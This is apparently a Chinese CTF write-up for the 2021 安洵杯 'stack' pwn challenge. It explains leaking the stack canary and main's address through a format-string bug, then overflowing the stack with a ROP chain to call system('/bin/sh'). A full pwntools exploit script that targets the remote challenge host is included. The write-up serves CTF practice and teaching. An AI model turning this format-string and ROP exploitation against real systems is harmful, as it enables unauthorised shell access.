[安洵杯 2021]stack题解

首先拿到附件先checksec~

保护基本上全开了

ida康康

漏洞非常明显,格式化字符串加栈溢出

那么思路就是先通过格式化字符串泄露canary和函数真实地址,然后栈溢出返回shell

 

 

甚至给了后门,他真的,我哭死。

然后就是调试

 

 下断点在printf,运行,再输入一串%p

然后看栈

 他甚至连canary都放的这么明显(0x7fffffffdf08)

而且canary往下第六个参数存放了main函数的地址(0x7fffffffdf28)

所以输入的格式化字符串为%11$p和%17$p(记得前六个参数存放在寄存器里)输入到第一个read中

 泄露代码如下

payload = '%17$p'+'%11$p'
io.sendline(payload)
addr = int(io.recv(14).decode(),16)
canary = int(io.recvuntil("00"),16)

然后在下一个read中根据main函数基址算偏移泄露其他部分构造rop链即可。

完整exp如下:

from pwn import*
io = remote('node4.anna.nssctf.cn',28459)
#io = process('./ezstack')
context.log_level = 'debug'
payload = '%17$p'+'%11$p'
elf = ELF('./ezstack')
io.sendline(payload)
addr = int(io.recv(14).decode(),16)
addrx = hex(addr)
print('main:')
print(addrx)
canary = int(io.recvuntil("00"),16)
canaryn = hex(canary)
print('canary:')
print(canaryn)
binsh = 0xb24
system = elf.sym['system']
main = 0x9dc
pro_base = addr-main
binsh_addr = pro_base + binsh
sys_addr = pro_base + system
binshn = hex(binsh_addr)
systema = hex(sys_addr)
rdi = pro_base + 0xb03//用Ropgadget找
ret = pro_base + 0x7c1
print(binshn)
print(systema)
payload2 = b'a'*(0x20-8)+p64(canary)+b'a'*8+p64(ret)+p64(rdi)+p64(binsh_addr)+p64(sys_addr)//记得用ret和ret_rdi传参
io.sendlineafter('--+--\n',payload2)
io.interactive()

成功getshell

希望对各位有所帮助

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值